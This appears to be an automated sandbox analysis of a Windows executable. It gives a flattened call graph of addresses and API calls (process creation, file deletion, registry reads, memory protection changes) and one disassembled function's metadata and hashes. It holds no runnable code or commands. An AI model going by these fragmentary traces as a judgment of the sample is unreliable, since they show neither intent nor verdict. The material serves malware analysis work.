6432->6423 6434 408ccc 4 API calls 6433->6434 6435 408d18 6434->6435 6435->6371 6437 4057b9 6436->6437 6438 405890 5 API calls 6437->6438 6439 4057cb 6438->6439 6439->6439 6440->6365 6656 406780 6441->6656 6444 403454 4 API calls 6445 4068aa 6444->6445 6446 406620 6445->6446 6661 406844 6446->6661 6449 406650 6451 403340 4 API calls 6449->6451 6450 40665e 6452 403454 4 API calls 6450->6452 6453 40665c 6451->6453 6454 406671 6452->6454 6456 403198 4 API calls 6453->6456 6455 403340 4 API calls 6454->6455 6455->6453 6457 406693 6456->6457 6458 406598 6457->6458 6459 4065a2 6458->6459 6460 4065c5 6458->6460 6667 4068b0 6459->6667 6461 40322c 4 API calls 6460->6461 6463 4065ce 6461->6463 6463->6381 6464 4065a9 6464->6460 6465 4065b4 6464->6465 6466 403340 4 API calls 6465->6466 6467 4065c2 6466->6467 6467->6381 6469 403344 6468->6469 6470 4033a5 6468->6470 6471 4031e8 6469->6471 6472 40334c 6469->6472 6473 4031fc 6471->6473 6478 403254 4 API calls 6471->6478 6472->6470 6475 40335b 6472->6475 6477 4031e8 4 API calls 6472->6477 6474 403228 6473->6474 6479 4025ac 4 API calls 6473->6479 6474->6383 6476 403254 4 API calls 6475->6476 6480 403375 6476->6480 6477->6475 6478->6473 6479->6474 6481 4031e8 4 API calls 6480->6481 6482 4033a1 6481->6482 6482->6383 6525 4069b8 6483->6525 6486 406c86 6488 4069b8 5 API calls 6486->6488 6490 406cd2 6486->6490 6489 406c96 6488->6489 6491 406ca2 6489->6491 6493 406994 7 API calls 6489->6493 6533 4067e8 6490->6533 6491->6490 6494 406cc7 6491->6494 6497 4069b8 5 API calls 6491->6497 6493->6491 6494->6490 6545 406c28 GetWindowsDirectoryA 6494->6545 6499 406cbb 6497->6499 6498 406598 5 API calls 6500 406ce7 6498->6500 6499->6494 6501 406994 7 API calls 6499->6501 6502 40322c 4 API calls 6500->6502 6501->6494 6503 406cf1 6502->6503 6504 4031b8 4 API calls 6503->6504 6505 406d0b 6504->6505 6505->6406 6507 409168 6506->6507 6508 406598 5 API calls 6507->6508 6509 409181 6508->6509 6510 40322c 4 API calls 6509->6510 6515 40918c 6510->6515 6512 4068d8 6 API calls 6512->6515 6513 4033b4 4 API calls 6513->6515 6514 408cfc 4 API calls 6514->6515 6515->6512 6515->6513 6515->6514 6516 4057e0 4 API calls 6515->6516 6518 409208 6515->6518 6585 4090d4 6515->6585 6593 408f58 6515->6593 6516->6515 6519 40322c 4 API calls 6518->6519 6520 409213 6519->6520 6521 4031b8 4 API calls 6520->6521 6522 40922d 6521->6522 6523 403198 4 API calls 6522->6523 6524 409235 6523->6524 6524->6406 6526 4034f0 4 API calls 6525->6526 6527 4069cb 6526->6527 6528 4069e2 GetEnvironmentVariableA 6527->6528 6532 4069f5 6527->6532 6547 406d4c 6527->6547 6528->6527 6529 4069ee 6528->6529 6530 403198 4 API calls 6529->6530 6530->6532 6532->6486 6542 406994 6532->6542 6534 403414 6533->6534 6535 40680b GetFullPathNameA 6534->6535 6536 406817 6535->6536 6537 40682e 6535->6537 6536->6537 6538 40681f 6536->6538 6539 40322c 4 API calls 6537->6539 6540 403278 4 API calls 6538->6540 6541 40682c 6539->6541 6540->6541 6541->6498 6551 40693c 6542->6551 6546 406c49 6545->6546 6546->6490 6548 406d5a 6547->6548 6549 4034f0 4 API calls 6548->6549 6550 406d68 6549->6550 6550->6527 6558 4068d8 6551->6558 6553 40695e 6554 406966 GetFileAttributesA 6553->6554 6555 40697b 6554->6555 6556 403198 4 API calls 6555->6556 6557 406983 6556->6557 6557->6486 6568 4066a4 6558->6568 6560 4068e9 6562 406910 6560->6562 6575 4068d0 CharPrevA 6560->6575 6563 406926 6562->6563 6564 40691b 6562->6564 6576 403454 6563->6576 6565 40322c 4 API calls 6564->6565 6567 406924 6565->6567 6567->6553 6571 4066b5 6568->6571 6569 406719 6570 4065e0 IsDBCSLeadByte 6569->6570 6572 406714 6569->6572 6570->6572 6571->6569 6574 4066d3 6571->6574 6572->6560 6574->6572 6583 4065e0 IsDBCSLeadByte 6574->6583 6575->6560 6577 403486 6576->6577 6578 403459 6576->6578 6579 403198 4 API calls 6577->6579 6578->6577 6581 40346d 6578->6581 6580 40347c 6579->6580 6580->6567 6582 403278 4 API calls 6581->6582 6582->6580 6584 4065f4 6583->6584 6584->6574 6586 403198 4 API calls 6585->6586 6588 4090f5 6586->6588 6590 409122 6588->6590 6602 4032a8 6588->6602 6605 403494 6588->6605 6591 403198 4 API calls 6590->6591 6592 409137 6591->6592 6592->6515 6594 408e94 2 API calls 6593->6594 6595 408f6e 6594->6595 6596 408f72 6595->6596 6609 4069a8 6595->6609 6596->6515 6599 408fa5 6600 408ed0 Wow64RevertWow64FsRedirection 6599->6600 6601 408fad 6600->6601 6601->6515 6603 403278 4 API calls 6602->6603 6604 4032b5 6603->6604 6604->6588 6606 403498 6605->6606 6608 4034c3 6605->6608 6607 4034f0 4 API calls 6606->6607 6607->6608 6608->6588 6610 40693c 7 API calls 6609->6610 6611 4069b2 GetLastError 6610->6611 6611->6599 6613 406fc7 6612->6613 6631 406fbe 6612->6631 6614 406fd0 6613->6614 6615 407008 6613->6615 6633 406ec8 6614->6633 6616 406ec8 RegOpenKeyExA 6615->6616 6618 407021 6616->6618 6620 40703e 6618->6620 6621 406ebc 6 API calls 6618->6621 6619 406fe9 6619->6620 6636 406ebc 6619->6636 6622 40322c 4 API calls 6620->6622 6625 407035 RegCloseKey 6621->6625 6626 40704b 6622->6626 6623 403198 4 API calls 6627 407080 6623->6627 6625->6620 6629 4032fc 4 API calls 6626->6629 6630 403198 4 API calls 6627->6630 6629->6631 6632 407088 6630->6632 6631->6623 6632->6425 6634 406ed3 6633->6634 6635 406ed9 RegOpenKeyExA 6633->6635 6634->6635 6635->6619 6639 406d70 6636->6639 6640 406d96 RegQueryValueExA 6639->6640 6644 406db9 6640->6644 6655 406ddb 6640->6655 6641 406dd3 6645 403198 4 API calls 6641->6645 6642 403198 4 API calls 6643 406ea7 RegCloseKey 6642->6643 6643->6620 6644->6641 6646 403278 4 API calls 6644->6646 6647 403420 4 API calls 6644->6647 6644->6655 6645->6655 6646->6644 6648 406e10 RegQueryValueExA 6647->6648 6648->6640 6649 406e2c 6648->6649 6650 4034f0 4 API calls 6649->6650 6649->6655 6651 406e6e 6650->6651 6652 406e80 6651->6652 6654 403420 4 API calls 6651->6654 6653 4031e8 4 API calls 6652->6653 6653->6655 6654->6652 6655->6642 6657 4066a4 IsDBCSLeadByte 6656->6657 6659 406795 6657->6659 6658 4067df 6658->6444 6659->6658 6660 4065e0 IsDBCSLeadByte 6659->6660 6660->6659 6662 406853 6661->6662 6663 406780 IsDBCSLeadByte 6662->6663 6666 40685e 6663->6666 6664 40664a 6664->6449 6664->6450 6665 4065e0 IsDBCSLeadByte 6665->6666 6666->6664 6666->6665 6668 4068b7 6667->6668 6669 4068bb 6667->6669 6668->6464 6672 4068d0 CharPrevA 6669->6672 6671 4068cc 6671->6464 6672->6671 5675 407628 WriteFile 5676 407648 5675->5676 5677 40764f 5675->5677 5678 4073ec 21 API calls 5676->5678 5679 407660 5677->5679 5680 40734c 20 API calls 5677->5680 5678->5677 5680->5679 5976 403a28 ReadFile 5977 403a46 5976->5977 5978 403a49 GetLastError 5976->5978 6677 403932 6678 403924 6677->6678 6679 40374c VariantClear 6678->6679 6680 40392c 6679->6680 6681 408b34 6682 408b3b 6681->6682 6683 403198 4 API calls 6682->6683 6690 408bd5 6683->6690 6684 408c00 6685 4031b8 4 API calls 6684->6685 6687 408c8d 6685->6687 6686 408bec 6689 4032fc 4 API calls 6686->6689 6688 403278 4 API calls 6688->6690 6689->6684 6690->6684 6690->6686 6690->6688 6691 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6690->6691 6691->6690 5985 407ec0 5986 407ee8 5985->5986 5988 407eef 5985->5988 5987 407dfc 21 API calls 5986->5987 5987->5988 5990 407f18 5988->5990 5992 407f16 5988->5992 5995 407f22 5988->5995 5989 407f57 5994 403198 4 API calls 5989->5994 5993 407d14 19 API calls 5990->5993 5991 407d14 19 API calls 5991->5989 5996 4050e4 19 API calls 5992->5996 5993->5995 5998 407f6c 5994->5998 5995->5989 5995->5991 5997 407f3e 5996->5997 6000 407c9c 5997->6000 6001 407c9f 6000->6001 6002 40322c 4 API calls 6001->6002 6003 407cc1 6002->6003 6004 4032fc 4 API calls 6003->6004 6005 407ccb 6004->6005 6006 4057e0 4 API calls 6005->6006 6007 407cda 6006->6007 6008 403198 4 API calls 6007->6008 6009 407cf4 6008->6009 6009->5995 5865 4075cc SetFilePointer 5866 407603 5865->5866 5867 4075f3 GetLastError 5865->5867 5867->5866 5868 4075fc 5867->5868 5869 4073ec 21 API calls 5868->5869 5869->5866 6014 402ccc 6017 402cfe 6014->6017 6018 402cdd 6014->6018 6015 402d88 RtlUnwind 6016 403154 4 API calls 6015->6016 6016->6017 6018->6015 6018->6017 6019 402b28 RaiseException 6018->6019 6020 402d7f 6019->6020 6020->6015 6700 403fcd 6701 403f07 4 API calls 6700->6701 6702 403fd6 6701->6702 6703 403e9c 4 API calls 6702->6703 6704 403fe2 6703->6704 4910 4024d0 4911 4024e4 4910->4911 4912 4024f7 4910->4912 4949 401918 RtlInitializeCriticalSection 4911->4949 4913 402518 4912->4913 4914 40250e RtlEnterCriticalSection 4912->4914 4926 402300 4913->4926 4914->4913 4918 4024ed 4920 402525 4922 402581 4920->4922 4923 402577 RtlLeaveCriticalSection 4920->4923 4923->4922 4924 402531 4924->4920 4956 40215c 4924->4956 4927 402314 4926->4927 4929 4023b8 4927->4929 4931 402335 4927->4931 4928 402344 4928->4920 4936 401fd4 4928->4936 4929->4928 4934 402455 4929->4934 4973 401d80 4929->4973 4981 401e84 4929->4981 4931->4928 4970 401b74 4931->4970 4934->4928 4977 401d00 4934->4977 4937 401fe8 4936->4937 4938 401ffb 4936->4938 4939 401918 4 API calls 4937->4939 4940 402012 RtlEnterCriticalSection 4938->4940 4943 40201c 4938->4943 4941 401fed 4939->4941 4940->4943 4941->4938 4942 401ff1 4941->4942 4946 402052 4942->4946 4943->4946 5063 401ee0 4943->5063 4946->4924 4947 402147 4947->4924 4948 40213d RtlLeaveCriticalSection 4948->4947 4950 40193c RtlEnterCriticalSection 4949->4950 4951 401946 4949->4951 4950->4951 4952 401964 LocalAlloc 4951->4952 4953 40197e 4952->4953 4954 4019c3 RtlLeaveCriticalSection 4953->4954 4955 4019cd 4953->4955 4954->4955 4955->4912 4955->4918 4957 40217a 4956->4957 4958 402175 4956->4958 4960 4021b5 4957->4960 4961 4021ab RtlEnterCriticalSection 4957->4961 4967 40217e 4957->4967 4959 401918 4 API calls 4958->4959 4959->4957 4962 402244 4960->4962 4966 4021c1 4960->4966 4968 402270 4960->4968 4961->4960 4965 401d80 7 API calls 4962->4965 4962->4967 4963 4022e3 RtlLeaveCriticalSection 4964 4022ed 4963->4964 4964->4920 4965->4967 4966->4963 4966->4964 4967->4920 4968->4966 4969 401d00 7 API calls 4968->4969 4969->4966 4971 40215c 9 API calls 4970->4971 4972 401b95 4971->4972 4972->4928 4974 401d92 4973->4974 4975 401d89 4973->4975 4974->4929 4975->4974 4976 401b74 9 API calls 4975->4976 4976->4974 4978 401d1e 4977->4978 4979 401d4e 4977->4979 4978->4928 4979->4978 4986 401c68 4979->4986 5041 401768 4981->5041 4983 401e99 4984 401ea6 4983->4984 5052 401dcc 4983->5052 4984->4929 4987 401c7a 4986->4987 4988 401c9d 4987->4988 4989 401caf 4987->4989 4999 40188c 4988->4999 4991 40188c 3 API calls 4989->4991 4992 401cad 4991->4992 4993 401cc5 4992->4993 5009 401b44 4992->5009 4993->4978 4995 401cd4 4996 401cee 4995->4996 5014 401b98 4995->5014 5019 4013a0 4996->5019 5000 4018b2 4999->5000 5001 40190b 4999->5001 5023 401658 5000->5023 5001->4992 5006 4018e6 5006->5001 5008 4013a0 LocalAlloc 5006->5008 5008->5001 5010 401b61 5009->5010 5011 401b52 5009->5011 5010->4995 5012 401d00 9 API calls 5011->5012 5013 401b5f 5012->5013 5013->4995 5015 401bab 5014->5015 5016 401b9d 5014->5016 5015->4996 5017 401b74 9 API calls 5016->5017 5018 401baa 5017->5018 5018->4996 5020 4013ab 5019->5020 5021 4013c6 5020->5021 5022 4012e4 LocalAlloc 5020->5022 5021->4993 5022->5021 5025 40168f 5023->5025 5024 4016cf 5027 40132c 5024->5027 5025->5024 5026 4016a9 VirtualFree 5025->5026 5026->5025 5028 401348 5027->5028 5035 4012e4 5028->5035 5031 40150c 5032 40153b 5031->5032 5033 401594 5032->5033 5034 401568 VirtualFree 5032->5034 5033->5006 5034->5032 5038 40128c 5035->5038 5039 401298 LocalAlloc 5038->5039 5040 4012aa 5038->5040 5039->5040 5040->5006 5040->5031 5042 401787 5041->5042 5043 40183b 5042->5043 5044 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5042->5044 5046 40132c LocalAlloc 5042->5046 5047 401821 5042->5047 5048 4017d6 5042->5048 5049 4017e7 5043->5049 5059 4015c4 5043->5059 5044->5042 5046->5042 5050 40150c VirtualFree 5047->5050 5051 40150c VirtualFree 5048->5051 5049->4983 5050->5049 5051->5049 5053 401d80 9 API calls 5052->5053 5054 401de0 5053->5054 5055 40132c LocalAlloc 5054->5055 5056 401df0 5055->5056 5057 401b44 9 API calls 5056->5057 5058 401df8 5056->5058 5057->5058 5058->4984 5060 40160a 5059->5060 5061 401626 VirtualAlloc 5060->5061 5062 40163a 5060->5062 5061->5060 5061->5062 5062->5049 5066 401ef0 5063->5066 5064 401f1c 5065 401d00 9 API calls 5064->5065 5068 401f40 5064->5068 5065->5068 5066->5064 5066->5068 5069 401e58 5066->5069 5068->4947 5068->4948 5074 4016d8 5069->5074 5072 401e75 5072->5066 5073 401dcc 9 API calls 5073->5072 5077 4016f4 5074->5077 5076 4016fe 5078 4015c4 VirtualAlloc 5076->5078 5077->5076 5079 40132c LocalAlloc 5077->5079 5081 40174f 5077->5081 5083 40175b 5077->5083 5084 401430 5077->5084 5080 40170a 5078->5080 5079->5077 5080->5083 5082 40150c VirtualFree 5081->5082 5082->5083 5083->5072 5083->5073 5085 40143f VirtualAlloc 5084->5085 5087 40146c 5085->5087 5088 40148f 5085->5088 5089 4012e4 LocalAlloc 5087->5089 5088->5077 5090 401478 5089->5090 5090->5088 5091 40147c VirtualFree 5090->5091 5091->5088 6025 4028d2 6026 4028da 6025->6026 6027 403554 4 API calls 6026->6027 6028 4028ef 6026->6028 6027->6026 6029 4025ac 4 API calls 6028->6029 6030 4028f4 6029->6030 6705 4019d3 6706 4019ba 6705->6706 6707 4019c3 RtlLeaveCriticalSection 6706->6707 6708 4019cd 6706->6708 6707->6708 5684 409fd8 5715 409460 GetLastError 5684->5715 5687 402f24 5 API calls 5688 409fe4 5687->5688 5689 409fee CreateWindowExA SetWindowLongA 5688->5689 5690 4050e4 19 API calls 5689->5690 5691 40a071 5690->5691 5728 4032fc 5691->5728 5693 40a07f 5694 4032fc 4 API calls 5693->5694 5695 40a08c 5694->5695 5742 406adc GetCommandLineA 5695->5742 5698 4032fc 4 API calls 5699 40a0a1 5698->5699 5747 409888 5699->5747 5703 40a0c6 5704 40a0e6 5703->5704 5705 40a0ff 5703->5705 5769 4093fc 5704->5769 5707 40a118 5705->5707 5710 40a112 RemoveDirectoryA 5705->5710 5708 40a121 73A15CF0 5707->5708 5709 40a12c 5707->5709 5708->5709 5711 40a154 5709->5711 5777 40357c 5709->5777 5710->5707 5713 40a14a 5714 4025ac 4 API calls 5713->5714 5714->5711 5790 404be4 5715->5790 5718 4071e4 5 API calls 5719 4094b7 5718->5719 5793 408ccc 5719->5793 5722 4057e0 4 API calls 5723 4094db 5722->5723 5724 4031b8 4 API calls 5723->5724 5725 4094fa 5724->5725 5726 403198 4 API calls 5725->5726 5727 409502 5726->5727 5727->5687 5729 403300 5728->5729 5730 40333f 5728->5730 5731 4031e8 5729->5731 5732 40330a 5729->5732 5730->5693 5733 4031fc 5731->5733 5739 403254 4 API calls 5731->5739 5734 403334 5732->5734 5735 40331d 5732->5735 5737 403228 5733->5737 5741 4025ac 4 API calls 5733->5741 5738 4034f0 4 API calls 5734->5738 5736 4034f0 4 API calls 5735->5736 5740 403322 5736->5740 5737->5693 5738->5740 5739->5733 5740->5693 5741->5737 5743 406a50 4 API calls 5742->5743 5744 406b01 5743->5744 5745 403198 4 API calls 5744->5745 5746 406b1f 5745->5746 5746->5698 5748 4033b4 4 API calls 5747->5748 5749 4098c3 5748->5749 5750 4098f5 CreateProcessA 5749->5750 5751 409901 5750->5751 5752 409908 CloseHandle 5750->5752 5753 409460 21 API calls 5751->5753 5754 409911 5752->5754 5753->5752 5807 40985c 5754->5807 5757 40992d 5758 40985c 3 API calls 5757->5758 5759 409932 GetExitCodeProcess CloseHandle 5758->5759 5760 409952 5759->5760 5761 403198 4 API calls 5760->5761 5762 40995a 5761->5762 5762->5703 5763 40969c 5762->5763 5764 4096a4 5763->5764 5768 4096de 5763->5768 5765 403420 4 API calls 5764->5765 5764->5768 5766 4096d8 5765->5766 5811 408da4 5766->5811 5768->5703 5770 409456 5769->5770 5771 40940f 5769->5771 5770->5705 5771->5770 5772 409417 Sleep 5771->5772 5773 409427 Sleep 5771->5773 5775 40943e GetLastError 5771->5775 5827 408ee0 5771->5827 5772->5771 5773->5771 5775->5770 5776 409448 GetLastError 5775->5776 5776->5770 5776->5771 5778 403591 5777->5778 5779 4035a0 5777->5779 5782 4035d0 5778->5782 5783 40359b 5778->5783 5787 4035b6 5778->5787 5780 4035b1 5779->5780 5781 4035b8 5779->5781 5784 403198 4 API calls 5780->5784 5785 4031b8 4 API calls 5781->5785 5782->5787 5788 40357c 4 API calls 5782->5788 5783->5779 5786 4035ec 5783->5786 5784->5787 5785->5787 5786->5787 5844 403554 5786->5844 5787->5713 5788->5782 5791 4050f8 19 API calls 5790->5791 5792 404c02 5791->5792 5792->5718 5794 408cec 5793->5794 5797 408ba4 5794->5797 5798 403198 4 API calls 5797->5798 5806 408bd5 5797->5806 5798->5806 5799 408c00 5800 4031b8 4 API calls 5799->5800 5802 408c8d 5800->5802 5801 408bec 5804 4032fc 4 API calls 5801->5804 5802->5722 5803 403278 4 API calls 5803->5806 5804->5799 5805 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5805->5806 5806->5799 5806->5801 5806->5803 5806->5805 5808 409870 PeekMessageA 5807->5808 5809 409882 MsgWaitForMultipleObjects 5808->5809 5810 409864 TranslateMessage DispatchMessageA 5808->5810 5809->5754 5809->5757 5810->5808 5812 408db2 5811->5812 5814 408dca 5812->5814 5824 408d3c 5812->5824 5815 408d3c 4 API calls 5814->5815 5816 408dee 5814->5816 5815->5816 5817 407878 InterlockedExchange 5816->5817 5818 408e09 5817->5818 5819 408d3c 4 API calls 5818->5819 5821 408e1c 5818->5821 5819->5821 5820 408d3c 4 API calls 5820->5821 5821->5820 5822 403278 4 API calls 5821->5822 5823 408e4b 5821->5823 5822->5821 5823->5768 5825 4057e0 4 API calls 5824->5825 5826 408d4d 5825->5826 5826->5814 5835 408e94 5827->5835 5829 408ef6 5830 408efa 5829->5830 5831 408f16 DeleteFileA GetLastError 5829->5831 5830->5771 5832 408f34 5831->5832 5841 408ed0 5832->5841 5836 408ea2 5835->5836 5837 408e9e 5835->5837 5838 408ec4 SetLastError 5836->5838 5839 408eab Wow64DisableWow64FsRedirection 5836->5839 5837->5829 5840 408ebf 5838->5840 5839->5840 5840->5829 5842 408ed5 Wow64RevertWow64FsRedirection 5841->5842 5843 408edf 5841->5843 5842->5843 5843->5771 5845 403566 5844->5845 5847 403578 5845->5847 5848 403604 5845->5848 5847->5786 5849 40357c 5848->5849 5852 4035d0 5849->5852 5853 40359b 5849->5853 5856 4035a0 5849->5856 5858 4035b6 5849->5858 5850 4035b1 5854 403198 4 API calls 5850->5854 5851 4035b8 5855 4031b8 4 API calls 5851->5855 5852->5858 5859 40357c 4 API calls 5852->5859 5853->5856 5857 4035ec 5853->5857 5854->5858 5855->5858 5856->5850 5856->5851 5857->5858 5860 403554 4 API calls 5857->5860 5858->5845 5859->5852 5860->5857 6712 4065dc IsDBCSLeadByte 6713 4065f4 6712->6713 6724 402be9 RaiseException 6725 402c04 6724->6725 6035 409ef0 6036 409f15 6035->6036 6037 407878 InterlockedExchange 6036->6037 6038 409f3f 6037->6038 6039 409984 4 API calls 6038->6039 6040 409f4f 6038->6040 6039->6040 6045 40760c SetEndOfFile 6040->6045 6042 409f6b 6043 4025ac 4 API calls 6042->6043 6044 409fa2 6043->6044 6046 407623 6045->6046 6047 40761c 6045->6047 6046->6042 6048 4073ec 21 API calls 6047->6048 6048->6046 6049 402af2 6050 402afe 6049->6050 6053 402ed0 6050->6053 6054 403154 4 API calls 6053->6054 6056 402ee0 6054->6056 6055 402b03 6056->6055 6058 402b0c 6056->6058 6059 402b25 6058->6059 6060 402b15 RaiseException 6058->6060 6059->6055 6060->6059 6061 405af2 6063 405af4 6061->6063 6062 405b30 6065 405890 5 API calls 6062->6065 6063->6062 6064 405b2a 6063->6064 6068 405b47 6063->6068 6064->6062 6066 405b9c 6064->6066 6067 405b43 6065->6067 6069 405900 19 API calls 6066->6069 6072 403198 4 API calls 6067->6072 6070 404c2c 5 API calls 6068->6070 6069->6067 6071 405b70 6070->6071 6073 405900 19 API calls 6071->6073 6074 405bd6 6072->6074 6073->6067 6726 402dfa 6727 402e26 6726->6727 6728 402e0d 6726->6728 6730 402ba4 6728->6730 6731 402bc9 6730->6731 6732 402bad 6730->6732 6731->6727 6733 402bb5 RaiseException 6732->6733 6733->6731 6734 4097fc 6735 409815 6734->6735 6736 40980b 6734->6736 6736->6735 6737 40983a CallWindowProcA 6736->6737 6737->6735 6097 403a80 CloseHandle 6098 403a90 6097->6098 6099 403a91 GetLastError 6097->6099 6100 404283 6101 4042c3 6100->6101 6102 403154 4 API calls 6101->6102 6103 404323 6102->6103 6742 404185 6743 4041ff 6742->6743 6744 4041cc 6743->6744 6745 403154 4 API calls 6743->6745 6746 404323 6745->6746 6104 403e87 6105 403e4c 6104->6105 6106 403e67 6105->6106 6107 403e62 6105->6107 6108 403e7b 6105->6108 6111 403e78 6106->6111 6117 402674 6106->6117 6113 403cc8 6107->6113 6110 402674 4 API calls 6108->6110 6110->6111 6114 403cd6 6113->6114 6115 403ceb 6114->6115 6116 402674 4 API calls 6114->6116 6115->6106 6116->6115 6118 403154 4 API calls 6117->6118 6119 40267a 6118->6119 6119->6111 5870 40758c ReadFile 5871 4075c3 5870->5871 5872 4075ac 5870->5872 5873 4075b2 GetLastError 5872->5873 5874 4075bc 5872->5874 5873->5871 5873->5874 5875 4073ec 21 API calls 5874->5875 5875->5871 6120 40708e 6121 407078 6120->6121 6122 403198 4 API calls 6121->6122 6123 407080 6122->6123 6124 403198 4 API calls 6123->6124 6125 407088 6124->6125 6130 403e95 6131 403e4c 6130->6131 6132 403e67 6131->6132 6133 403e62 6131->6133 6134 403e7b 6131->6134 6137 403e78 6132->6137 6138 402674 4 API calls 6132->6138 6135 403cc8 4 API calls 6133->6135 6136 402674 4 API calls 6134->6136 6135->6132 6136->6137 6138->6137 6139 403a97 6140 403aac 6139->6140 6141 403bbc GetStdHandle 6140->6141 6142 403b0e CreateFileA 6140->6142 6152 403ab2 6140->6152 6143 403c17 GetLastError 6141->6143 6147 403bba 6141->6147 6142->6143 6144 403b2c 6142->6144 6143->6152 6146 403b3b GetFileSize 6144->6146 6144->6147 6146->6143 6148 403b4e SetFilePointer 6146->6148 6149 403be7 GetFileType 6147->6149 6147->6152 6148->6143 6153 403b6a ReadFile 6148->6153 6151 403c02 CloseHandle 6149->6151 6149->6152 6151->6152 6153->6143 6154 403b8c 6153->6154 6154->6147 6155 403b9f SetFilePointer 6154->6155 6155->6143 6156 403bb0 SetEndOfFile 6155->6156 6156->6143 6156->6147 5681 4074a8 5682 4074b4 CloseHandle 5681->5682 5683 4074bd 5681->5683 5682->5683 6759 40a1a9 6768 409514 6759->6768 6762 402f24 5 API calls 6763 40a1b3 6762->6763 6764 403198 4 API calls 6763->6764 6765 40a1d2 6764->6765 6766 403198 4 API calls 6765->6766 6767 40a1da 6766->6767 6777 4055fc 6768->6777 6770 40955d 6774 403198 4 API calls 6770->6774 6771 40952f 6771->6770 6783 40716c 6771->6783 6773 40954d 6776 409555 MessageBoxA 6773->6776 6775 409572 6774->6775 6775->6762 6775->6763 6776->6770 6778 403154 4 API calls 6777->6778 6779 405601 6778->6779 6780 405619 6779->6780 6781 403154 4 API calls 6779->6781 6780->6771 6782 40560f 6781->6782 6782->6771 6784 4055fc 4 API calls 6783->6784 6785 40717b 6784->6785 6786 407181 6785->6786 6788 40718f 6785->6788 6787 40322c 4 API calls 6786->6787 6789 40718d 6787->6789 6790 4071ab 6788->6790 6791 40719f 6788->6791 6789->6773 6801 4032b8 6790->6801 6794 407130 6791->6794 6795 40322c 4 API calls 6794->6795 6796 40713f 6795->6796 6797 40715c 6796->6797 6798 4068b0 CharPrevA 6796->6798 6797->6789 6799 40714b 6798->6799 6799->6797 6800 4032fc 4 API calls 6799->6800 6800->6797 6802 403278 4 API calls 6801->6802 6803 4032c2 6802->6803 6803->6789 6804 4011aa 6805 4011ac GetStdHandle 6804->6805 6164 4028ac 6165 402594 4 API calls 6164->6165 6166 4028b6 6165->6166 6171 4050b0 6172 4050c3 6171->6172 6173 404da8 19 API calls 6172->6173 6174 4050d7 6173->6174 6814 409fb4 6815 409fe4 6814->6815 6816 409fee CreateWindowExA SetWindowLongA 6815->6816 6817 4050e4 19 API calls 6816->6817 6818 40a071 6817->6818 6819 4032fc 4 API calls 6818->6819 6820 40a07f 6819->6820 6821 4032fc 4 API calls 6820->6821 6822 40a08c 6821->6822 6823 406adc 5 API calls 6822->6823 6824 40a098 6823->6824 6825 4032fc 4 API calls 6824->6825 6826 40a0a1 6825->6826 6827 409888 29 API calls 6826->6827 6828 40a0b3 6827->6828 6829 40969c 5 API calls 6828->6829 6830 40a0c6 6828->6830 6829->6830 6831 40a0ff 6830->6831 6832 4093fc 9 API calls 6830->6832 6833 40a118 6831->6833 6836 40a112 RemoveDirectoryA 6831->6836 6832->6831 6834 40a121 73A15CF0 6833->6834 6835 40a12c 6833->6835 6834->6835 6837 40a154 6835->6837 6838 40357c 4 API calls 6835->6838 6836->6833 6839 40a14a 6838->6839 6840 4025ac 4 API calls 6839->6840 6840->6837 6175 401ab9 6176 401a96 6175->6176 6177 401aa9 RtlDeleteCriticalSection 6176->6177 6178 401a9f RtlLeaveCriticalSection 6176->6178 6178->6177

                                                                                      Executed Functions

                                                                                      Function 00409A14 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 108 409a14-409a38 GetSystemInfo VirtualQuery 109 409ac8-409acf 108->109 110 409a3e 108->110 111 409abd-409ac2 110->111 111->109 112 409a40-409a47 111->112 113 409aa9-409abb VirtualQuery 112->113 114 409a49-409a4d 112->114 113->109 113->111 114->113 115 409a4f-409a57 114->115 116 409a68-409a79 VirtualProtect 115->116 117 409a59-409a5c 115->117 119 409a7b 116->119 120 409a7d-409a7f 116->120 117->116 118 409a5e-409a61 117->118 118->116 122 409a63-409a66 118->122 119->120 121 409a8e-409a91 120->121 123 409a81-409a8a call 409a0c 121->123 124 409a93-409a95 121->124 122->116 122->120 123->121 124->113 126 409a97-409aa4 VirtualProtect 124->126 126->113
                                                                                      APIs
                                                                                      • GetSystemInfo.KERNEL32(?), ref: 00409A26
                                                                                      • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409A31
                                                                                      • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409A72
                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409AA4
                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409AB4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2441996862-0
                                                                                      • Opcode ID: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                                      • Instruction ID: 05782b2e5a8588c9c74d05110837466633af9a4b7a19298b20ab433fd050a55e
                                                                                      • Opcode Fuzzy Hash: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                                      • Instruction Fuzzy Hash: D0216FB13003846BD6309A698C85E67B7DC9F85360F18492AFA85E62C3D73DED40CB59
                                                                                      Function 0040515C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                                      Memory Dump Source
